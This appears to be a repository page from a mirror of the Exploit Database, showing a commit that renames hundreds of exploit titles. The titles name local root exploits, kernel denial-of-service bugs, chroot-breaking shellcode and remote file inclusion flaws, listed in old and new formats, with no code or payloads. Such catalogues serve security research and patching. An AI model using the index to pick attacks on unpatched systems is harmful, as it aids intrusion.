bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/39590.txt
Offensive Security ca6eab30f8 DB: 2016-03-23 
6 new exploits

Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit
Linux Kernel 2.2.x - 2.4.x - ptrace/kmod Local Root Exploit

Apache HTTP Server 2.x Memory Leak Exploit
Apache HTTP Server 2.x - Memory Leak Exploit

Mac OS X <= 10.2.4 DirectoryService (PATH) Local Root Exploit
Mac OS X <= 10.2.4 - DirectoryService (PATH) Local Root Exploit

CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit
CommuniGate Pro Webmail 4.0.6 - Session Hijacking Exploit

OpenBSD (ibcs2_exec) Kernel Local Exploit
OpenBSD - (ibcs2_exec) Kernel Local Exploit

HP-UX B11.11 /usr/bin/ct Local Format String Root Exploit
HP-UX B11.11 - /usr/bin/ct Local Format String Root Exploit

traceroute Local Root Exploit
traceroute - Local Root Exploit

vixie-cron Local Root Exploit
vixie-cron - Local Root Exploit

BSDi 3.0 inc Local Root Buffer Overflow Exploit
BSDi 3.0 inc - Local Root Buffer Overflow Exploit

GLIBC (via /bin/su) Local Root Exploit
GLIBC (via /bin/su) - Local Root Exploit

Linux Kernel 2.2 (TCP/IP Weakness) Exploit
Linux Kernel 2.2 - (TCP/IP Weakness) Exploit

BSD chpass (pw_error(3)) Local Root Exploit
BSD chpass - (pw_error(3)) Local Root Exploit

Tru64 UNIX 4.0g /usr/bin/at Local Root Exploit
Tru64 UNIX 4.0g - /usr/bin/at Local Root Exploit
FreeBSD 3.5.1/4.2 ports package xklock Local Root Exploit
FreeBSD 3.5.1/4.2 Ports Package elvrec Local Root Exploit
Progress Database Server 8.3b (prodb) Local Root Exploit
FreeBSD 3.5.1/4.2 - ports package xklock Local Root Exploit
FreeBSD 3.5.1/4.2 - Ports Package elvrec Local Root Exploit
Progress Database Server 8.3b - (prodb) Local Root Exploit

Xt Library Local Root Command Execution Exploit
Xt Library - Local Root Command Execution Exploit

AIX lquerylv Local Root Buffer Overflow Exploit
AIX lquerylv - Local Root Buffer Overflow Exploit
IRIX 5.3 /usr/sbin/iwsh Local Root Buffer Overflow
Solaris 5.5.1 X11R6.3 xterm (-xrm) Local Root Exploit
IRIX 5.3 - /usr/sbin/iwsh Local Root Buffer Overflow
Solaris 5.5.1 X11R6.3 - xterm (-xrm) Local Root Exploit

Mac OS X Panther Internet Connect Local Root Exploit
Mac OS X - Panther Internet Connect Local Root Exploit

Linux Kernel File Offset Pointer Handling Memory Disclosure Exploit
Linux Kernel - File Offset Pointer Handling Memory Disclosure Exploit

SquirrelMail (chpasswd) Local Root Bruteforce Exploit
SquirrelMail - (chpasswd) Local Root Bruteforce Exploit

CDRDAO Local Root Exploit
CDRDAO - Local Root Exploit

SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit
SCO Openserver 5.0.7 - (MMDF deliver) Local Root Exploit

OpenText FirstClass 8.0 HTTP Daemon /Search Remote DoS
OpenText FirstClass 8.0 - HTTP Daemon /Search Remote DoS

Solaris 8/9 passwd circ() Local Root Exploit
Solaris 8/9 - passwd circ() Local Root Exploit

PaX Double-Mirrored VMA munmap Local Root Exploit
PaX - Double-Mirrored VMA munmap Local Root Exploit

Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local Root Buffer Overflow
Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow

Solaris 10.x ESRI Arcgis Local Root Format String Exploit
Solaris 10.x - ESRI Arcgis Local Root Format String Exploit

dSMTP Mail Server 3.1b Linux Remote Root Format String Exploit
dSMTP Mail Server 3.1b - Linux Remote Root Format String Exploit

AIX 5.2 paginit Local Root Exploit
AIX 5.2 - paginit Local Root Exploit

Solaris 9 / 10 ld.so Local Root Exploit (1)
Solaris 9 / 10 - ld.so Local Root Exploit (1)

phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit
phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit)

vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit
vBulletin <= 3.0.6 (Template) Command Execution Exploit (Metasploit)

Microsoft Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit
Microsoft Windows XP SP2 - (rdpwd.sys) Remote Kernel DoS Exploit

WordPress <= 1.5.1.3 - Remote Code Execution eXploit (Metasploit
WordPress <= 1.5.1.3 - Remote Code Execution exploit (Metasploit)

Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit
Solaris <= 10 LPD Arbitrary File Delete Exploit (Metasploit)

Debian 2.2 /usr/bin/pileup Local Root Exploit
Debian 2.2 - /usr/bin/pileup Local Root Exploit

Solaris 2.6/7/8/9 (ld.so.1) Local Root Exploit (sparc)
Solaris 2.6/7/8/9 - (ld.so.1) Local Root Exploit (sparc)

Wireless Tools 26 (iwconfig) Local Root Exploit (some setuid)
Wireless Tools 26 - (iwconfig) Local Root Exploit (some setuid)

Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd)
Qpopper <= 4.0.8 - (poppassd) Local Root Exploit (freebsd)

Solaris 10 DtPrintinfo/Session Local Root Exploit (x86)
Solaris 10 - DtPrintinfo/Session Local Root Exploit (x86)

XMail 1.21 (-t Command Line Option) Local Root Buffer Overflow Exploit
XMail 1.21 - (-t Command Line Option) Local Root Buffer Overflow Exploit

linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit
linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit

QNX Neutrino 6.2.1 (phfont) Race Condition Local Root Exploit
QNX Neutrino 6.2.1 - (phfont) Race Condition Local Root Exploit

FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit
FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service Exploit

Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit
Apple Mac OS X - (/usr/bin/passwd) Custom Passwd Local Root Exploit

Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit
Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)

Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit
Rocks Clusters <= 4.1 - (mount-loop) Local Root Exploit

Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit
Solaris <= 10 - sysinfo() Local Kernel Memory Disclosure Exploit

liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit
liblesstif <= 2-0.93.94-4mdk - (DEBUG_FILE) Local Root Exploit

Mac OS X <= 10.4.7 Mach Exception Handling Local Root Exploit
Mac OS X <= 10.4.7 - Mach Exception Handling Local Root Exploit

Xcode OpenBase <= 9.1.5 (root file create) Local Root Exploit (OSX)
Xcode OpenBase <= 9.1.5 - (root file create) Local Root Exploit (OSX)
HP-UX 11i (swpackage) Stack Overflow Local Root Exploit
HP-UX 11i (swmodify) Stack Overflow Local Root Exploit
HP-UX 11i (swask) Format String Local Root Exploit
HP-UX 11i (LIBC TZ enviroment variable) Local Root Exploit
HP-UX 11i - (swpackage) Stack Overflow Local Root Exploit
HP-UX 11i - (swmodify) Stack Overflow Local Root Exploit
HP-UX 11i - (swask) Format String Local Root Exploit
HP-UX 11i - (LIBC TZ enviroment variable) Local Root Exploit

FreeBSD 6.1 (/dev/crypto) Local Kernel Denial of Service Exploit
FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service Exploit

Apple Airport 802.11 Probe Response Kernel Memory Corruption PoC
Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC
Xcode OpenBase <= 10.0.0 (symlink) Local Root Exploit (OSX)
Xcode OpenBase <= 10.0.0 (unsafe system call) Local Root Exploit (OSX)
Xcode OpenBase <= 10.0.0 - (symlink) Local Root Exploit (OSX)
Xcode OpenBase <= 10.0.0 - (unsafe system call) Local Root Exploit (OSX)

Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption Exploit
Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption Exploit

Mac OS X 10.4.x Kernel shared_region_map_file_np() Memory Corruption
Mac OS X 10.4.x Kernel - shared_region_map_file_np() Memory Corruption

Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption
Plan 9 Kernel (devenv.c OTRUNC/pwrite) Local Exploit
Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
Plan 9 Kernel - (devenv.c OTRUNC/pwrite) Local Exploit
Ubuntu/Debian Apache 1.3.33/1.3.34 - (CGI TTY) Local Root Exploit

madwifi <= 0.9.2.1 WPA/RSN IE Remote Kernel Buffer Overflow Exploit
madwifi <= 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow Exploit

PHP FirstPost 0.1 (block.php Include) Remote File Inclusion Exploit
PHP FirstPost 0.1 - (block.php Include) Remote File Inclusion Exploit
IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit
IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit
IBM AIX <= 5.3 sp6 ftp gets() Local Root Exploit
IBM AIX <= 5.3 sp6 - capture Terminal Sequence Local Root Exploit
IBM AIX <= 5.3 sp6 - pioout Arbitrary Library Loading Local Root Exploit
IBM AIX <= 5.3 sp6 - ftp gets() Local Root Exploit

Linux Kernel 2.4/2.6 x86-64 System Call Emulation Exploit
Linux Kernel 2.4/2.6 - x86-64 System Call Emulation Exploit
Solaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit
Solaris fifofs I_PEEK Kernel Memory Disclosure Exploit (x86/sparc)
Solaris 10 - x86/sparc sysinfo Kernel Memory Disclosure Exploit
Solaris - fifofs I_PEEK Kernel Memory Disclosure Exploit (x86/sparc)

Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow PoC
Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow PoC

Apple Mac OS X xnu <= 1228.0 mach-o Local Kernel Denial of Service PoC
Apple Mac OS X xnu <= 1228.0 - mach-o Local Kernel Denial of Service PoC

Cisco VPN Client IPSec Driver Local kernel system pool Corruption PoC
Cisco VPN Client - IPSec Driver Local kernel system pool Corruption PoC
DESlock+ <= 3.2.6 (list) Local Kernel Memory Leak PoC
DESlock+ <= 3.2.6 DLMFENC.sys Local Kernel ring0 link list zero PoC
DESlock+ <= 3.2.6 - (list) Local Kernel Memory Leak PoC
DESlock+ <= 3.2.6 - DLMFENC.sys Local Kernel ring0 link list zero PoC

DESlock+ <= 3.2.6 DLMFDISK.sys Local kernel ring0 SYSTEM Exploit
DESlock+ <= 3.2.6 - DLMFDISK.sys Local kernel ring0 SYSTEM Exploit

SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit
SCO UnixWare < 7.1.4 p534589 - (pkgadd) Local Root Exploit

SCO UnixWare Merge mcd Local Root Exploit
SCO UnixWare Merge - mcd Local Root Exploit

Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM Exploit
Deterministic Network Enhancer - dne2000.sys kernel ring0 SYSTEM Exploit

OpenBSD 4.0 (FIRST ANIMATED EXPLOIT) Local Root Exploit (vga)
OpenBSD 4.0 - Local Root Exploit (vga)

DESlock+ <= 3.2.7 (probe read) Local Kernel Denial of Service PoC
DESlock+ <= 3.2.7 - (probe read) Local Kernel Denial of Service PoC

QNX 6.4.0 bitflipped elf binary (id) Kernel Panic Exploit
QNX 6.4.0 - bitflipped elf binary (id) Kernel Panic Exploit

FreeBSD 7.x (Dumping Environment) Local Kernel Panic Exploit
FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit
FreeBSD 7.0/7.1 (ktimer) Local Kernel Root Exploit
Mac OS X xnu <= 1228.3.13 (zip-notify) Remote Kernel Overflow PoC
Mac OS X xnu <= 1228.3.13 (macfsstat) Local Kernel Memory Leak/DoS
Mac OS X xnu <= 1228.3.13 (profil) Kernel Memory Leak/DoS PoC
FreeBSD 7.0/7.1 - (ktimer) Local Kernel Root Exploit
Mac OS X xnu <= 1228.3.13 - (zip-notify) Remote Kernel Overflow PoC
Mac OS X xnu <= 1228.3.13 - (macfsstat) Local Kernel Memory Leak/DoS
Mac OS X xnu <= 1228.3.13 - (profil) Kernel Memory Leak/DoS PoC

Mac OS X xnu <= 1228.x (hfs-fcntl) Local Kernel Root Exploit
Mac OS X xnu <= 1228.x - (hfs-fcntl) Local Kernel Root Exploit
Solaris 10 / OpenSolaris (dtrace) Local Kernel Denial of Service PoC
Solaris 10 / OpenSolaris (fasttrap) Local Kernel Denial of Service PoC
Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service PoC
Solaris 10 / OpenSolaris - (fasttrap) Local Kernel Denial of Service PoC

DESlock+ 4.0.2 dlpcrypt.sys Local Kernel ring0 Code Execution Exploit
DESlock+ 4.0.2 - dlpcrypt.sys Local Kernel ring0 Code Execution Exploit

FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit
FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service Exploit

VMWare Fusion <= 2.0.5 vmx86 kext Local kernel Root Exploit
VMWare Fusion <= 2.0.5 - vmx86 kext Local kernel Root Exploit

Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service
Linux Kernel < 2.6.31-rc4 - nfs4_proc_lock() Denial of Service

Authentium SafeCentral <= 2.6 shdrv.sys Local kernel ring0 SYSTEM Exploit
Authentium SafeCentral <= 2.6 - shdrv.sys Local kernel ring0 SYSTEM Exploit
Windows 2000/XP/2003 Win32k.sys SfnLOGONNOTIFY Local kernel Denial of Service Vulnerability
Windows 2000/XP/2003 Win32k.sys SfnINSTRING Local kernel Denial of Service Vulnerability
Windows 2000/XP/2003 - Win32k.sys SfnLOGONNOTIFY Local kernel Denial of Service Vulnerability
Windows 2000/XP/2003 - Win32k.sys SfnINSTRING Local kernel Denial of Service Vulnerability

linux/x86 chroot & standart 66 bytes
linux/x86 - chroot & standart 66 bytes
linux/x86 break chroot 34 bytes
linux/x86 break chroot 46 bytes
linux/x86 break chroot execve /bin/sh 80 bytes
linux/x86 - break chroot 34 bytes
linux/x86 - break chroot 46 bytes
linux/x86 - break chroot execve /bin/sh 80 bytes

linux chroot()/execve() code
linux - chroot()/execve() code

linux/x86 break chroot setuid(0) + /bin/sh 132 bytes
linux/x86 - break chroot setuid(0) + /bin/sh 132 bytes

linux/x86 break chroot 79 bytes
linux/x86 - break chroot 79 bytes
FreeBSD Kernel nfs_mount() Exploit
FreeBSD Kernel mountnfs() Exploit
FreeBSD Kernel - nfs_mount() Exploit
FreeBSD Kernel - mountnfs() Exploit

FreeBSD 8.1/7.3 vm.pmap Kernel Local Race Condition
FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition

Kingsoft Antivirus <= 2010.04.26.648 Kernel Buffer Overflow Exploit
Kingsoft Antivirus <= 2010.04.26.648 - Kernel Buffer Overflow Exploit

Linux Kernel Stack Infoleaks Vulnerability
Linux Kernel - Stack Infoleaks Vulnerability

Linux Kernel 'setup_arg_pages()' Denial of Service Vulnerability
Linux Kernel - 'setup_arg_pages()' Denial of Service Vulnerability

IBM Tivoli Storage Manager (TSM) Local Root
IBM Tivoli Storage Manager (TSM) - Local Root

DESlock+ <= 4.1.10 vdlptokn.sys Local Kernel ring0 SYSTEM Exploit
DESlock+ <= 4.1.10 - vdlptokn.sys Local Kernel ring0 SYSTEM Exploit

Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS
Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS

IPComp encapsulation pre-auth kernel memory corruption
IPComp - encapsulation pre-auth kernel memory corruption

Linux Kernel 'perf_count_sw_cpu_clock' event Denial of Service
Linux Kernel - 'perf_count_sw_cpu_clock' event Denial of Service

Mac OS X < 10.6.7 Kernel Panic Exploit
Mac OS X < 10.6.7 - Kernel Panic Exploit

Calibre E-Book Reader Local Root Exploit
Calibre E-Book Reader - Local Root Exploit (1)
Calibre E-Book Reader Local Root Exploit
Calibre E-Book Reader Local Root Race Condition Exploit
Calibre E-Book Reader - Local Root Exploit (2)
Calibre E-Book Reader - Local Root Race Condition Exploit

Calibre E-Book Reader Local Root
Calibre E-Book Reader - Local Root

Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS
Vanilla FirstLastNames 1.3.2 Plugin - Persistant XSS

Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability
Webspell FIRSTBORN Movie-Addon - Blind SQL Injection Vulnerability

Linux kernel 2.0/2.1 SIGIO Vulnerability
Linux kernel 2.0/2.1 - SIGIO Vulnerability

Digital UNIX <= 4.0 D_FreeBSD <= 2.2.4_HP HP-UX 10.20/11.0_IBM AIX <= 3.2.5_Linux kernel 2.0/2.1_NetBSD 1.2_Solaris <= 2.5.1 Smurf Denial of Service Vulnerability
Digital UNIX <= 4.0 D_FreeBSD <= 2.2.4_HP HP-UX 10.20/11.0_IBM AIX <= 3.2.5_Linux kernel 2.0/2.1_NetBSD 1.2_Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability

Slackware Linux <= 3.5 /etc/group missing results in Root access Vulnerability
Slackware Linux <= 3.5 - /etc/group missing results in Root access Vulnerability

Linux kernel 2.0/2.1/2.2 autofs Vulnerability
Linux kernel 2.0/2.1/2.2 - autofs Vulnerability
Linux kernel 2.0 TCP Port DoS Vulnerability
Linux kernel 2.2 ldd core Vulnerability
Linux kernel 2.0 - TCP Port DoS Vulnerability
Linux kernel 2.2 - ldd core Vulnerability

Linux kernel 2.0.33 IP Fragment Overlap Vulnerability
Linux kernel 2.0.33 - IP Fragment Overlap Vulnerability

Linux kernel 2.0/2.0.33 i_count Overflow Vulnerability
Linux kernel 2.0/2.0.33 - i_count Overflow Vulnerability

Linux kernel 2.0.37 Segment Limit Vulnerability
Linux kernel 2.0.37 - Segment Limit Vulnerability

BSD/OS <= 4.0_FreeBSD <= 3.2_Linux kernel <= 2.3_NetBSD <= 1.4 Shared Memory Denial of Service Vulnerability
BSD/OS <= 4.0_FreeBSD <= 3.2_Linux kernel <= 2.3_NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability

Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability
Linux kernel 2.2 - Predictable TCP Initial Sequence Number Vulnerability

Debian 2.1_Linux kernel 2.0.x_RedHat 5.2 Packet Length with Options Vulnerability
Debian 2.1_Linux kernel 2.0.x_RedHat 5.2 - Packet Length with Options Vulnerability

FreeBSD Kernel SCTP Remote NULL Ptr Dereference DoS
FreeBSD Kernel - SCTP Remote NULL Ptr Dereference DoS

Linux Kernel 2.2.x Non-Readable File Ptrace Vulnerability
Linux Kernel 2.2.x - Non-Readable File Ptrace Vulnerability

Linux kernel 2.1.89/2.2.x Zero-Length Fragment Vulnerability
Linux kernel 2.1.89/2.2.x - Zero-Length Fragment Vulnerability

Linux kernel 2.4 IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion
Linux kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion

Microsoft Windows Kernel Intel x64 SYSRET PoC
Microsoft Windows Kernel - Intel x64 SYSRET PoC

Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (Metasploit
Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (Metasploit)

Linux kernel 2.2/2.4 procfs Stream Redirection to Process Memory Vulnerability
Linux kernel 2.2/2.4 - procfs Stream Redirection to Process Memory Vulnerability

CylantSecure 1.0 Kernel Module Syscall Rerouting Vulnerability
CylantSecure 1.0 - Kernel Module Syscall Rerouting Vulnerability

HP-UX 11_Linux kernel 2.4_Windows 2000/NT 4.0_IRIX 6.5 Small TCP MSS DoS
HP-UX 11_Linux kernel 2.4_Windows 2000/NT 4.0_IRIX 6.5 - Small TCP MSS DoS

Linux kernel 2.2/2.4 Deep Symbolic Link Denial of Service Vulnerability
Linux kernel 2.2/2.4 - Deep Symbolic Link Denial of Service Vulnerability

Linux Kernel 2.2/2.4 Ptrace/Setuid Exec Vulnerability
Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Vulnerability

Linux Kernel 2.2.x/2.3/2.4.x d_path() Path Truncation Vulnerability
Linux Kernel 2.2.x/2.3/2.4.x - d_path() Path Truncation Vulnerability

grsecurity Kernel Patch 1.9.4 Linux Kernel Memory Protection Weakness
grsecurity Kernel Patch 1.9.4 - Linux Kernel Memory Protection Weakness
BubbleMon 1.x Kernel Memory File Descriptor Leakage Vulnerability
ASCPU 0.60 Kernel Memory File Descriptor Leakage Vulnerability
BubbleMon 1.x Kernel - Memory File Descriptor Leakage Vulnerability
ASCPU 0.60 Kernel - Memory File Descriptor Leakage Vulnerability

Linux Kernel 2.0.x/2.2.x/2.4.x_FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure
Linux Kernel 2.0.x/2.2.x/2.4.x_FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure

Linux kernel 2.2.x/2.4.x I/O System Call File Existence Weakness
Linux kernel 2.2.x/2.4.x - I/O System Call File Existence Weakness

Linux kernel 2.2./2.4.x /proc Filesystem Potential Information Disclosure Vulnerability
Linux kernel 2.2./2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability

Centrinity FirstClass 7.1 HTTP Server Directory Disclosure Vulnerability
Centrinity FirstClass 7.1 - HTTP Server Directory Disclosure Vulnerability

Linux VServer Project 1.2x CHRoot Breakout Vulnerability
Linux VServer Project 1.2x - CHRoot Breakout Vulnerability

Sun Solaris 8/9 Unspecified Passwd Local Root Compromise Vulnerability
Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability

Centrinity FirstClass HTTP Server 5/7 TargetName Parameter Cross-Site Scripting Vulnerability
Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting Vulnerability

Darwin Kernel 7.1 Mach File Parsing Local Integer Overflow Vulnerability
Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow Vulnerability

Linux Kernel NFS and EXT3 Combination Remote Denial of Service Vulnerability
Linux Kernel - NFS and EXT3 Combination Remote Denial of Service Vulnerability
Campsite 2.6.1 SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 SystemPref.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - SystemPref.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Template.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Template.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - TimeUnit.php g_documentRoot Parameter Remote File Inclusion

Sienzo Digital Music Mentor DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities
Sienzo Digital Music Mentor - DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities
Campsite 2.6.1 Alias.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Article.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ArticleComment.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ArticleData.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ArticleImage.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ArticleIndex.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ArticlePublish.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ArticleTopic.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ArticleType.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ArticleTypeField.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Country.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 DatabaseObject.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Alias.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Article.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ArticleComment.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ArticleData.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ArticleImage.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ArticleIndex.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ArticlePublish.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ArticleTopic.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ArticleType.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ArticleTypeField.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Country.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - DatabaseObject.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Event.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 IPAccess.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Image.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Issue.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 IssuePublish.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Language.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Log.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 LoginAttempts.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Publication.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Section.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 ShortURL.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Subscription.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 SubscriptionDefaultTime.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 Topic.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 UrlType.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 User.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 UserType.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Event.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - IPAccess.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Image.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Issue.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - IssuePublish.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Language.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Log.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - LoginAttempts.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Publication.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Section.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - ShortURL.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Subscription.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - SubscriptionDefaultTime.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - Topic.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - UrlType.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - User.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - UserType.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion
Campsite 2.6.1 - implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion

Linux Kernel 2.6.22 IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability
Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability

CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities
CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities

Fedora 8/9 Linux Kernel 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability
Fedora 8/9 Linux Kernel - 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability

MySQL <= 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS
MySQL <= 6.0.9 - GeomFromWKB() Function First Argument Geometry Value Handling DoS

VMware Workstations 10.0.0.40273 vmx86.sys Arbitrary Kernel Read
VMware Workstations 10.0.0.40273 - vmx86.sys Arbitrary Kernel Read

Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness
Linux Kernel <= 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure Weakness

Linux Kernel Network Namespace Remote Denial of Service Vulnerability
Linux Kernel - Network Namespace Remote Denial of Service Vulnerability

Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability
Linux Kernel <= 3.1.8 - KVM Local Denial of Service Vulnerability

Linux Kernel 2.6.x 'rds_recvmsg()' Function Local Information Disclosure Vulnerability
Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure Vulnerability

Linux Kernel 3.2.x 'uname()' System Call Local Information Disclosure Vulnerability
Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure Vulnerability

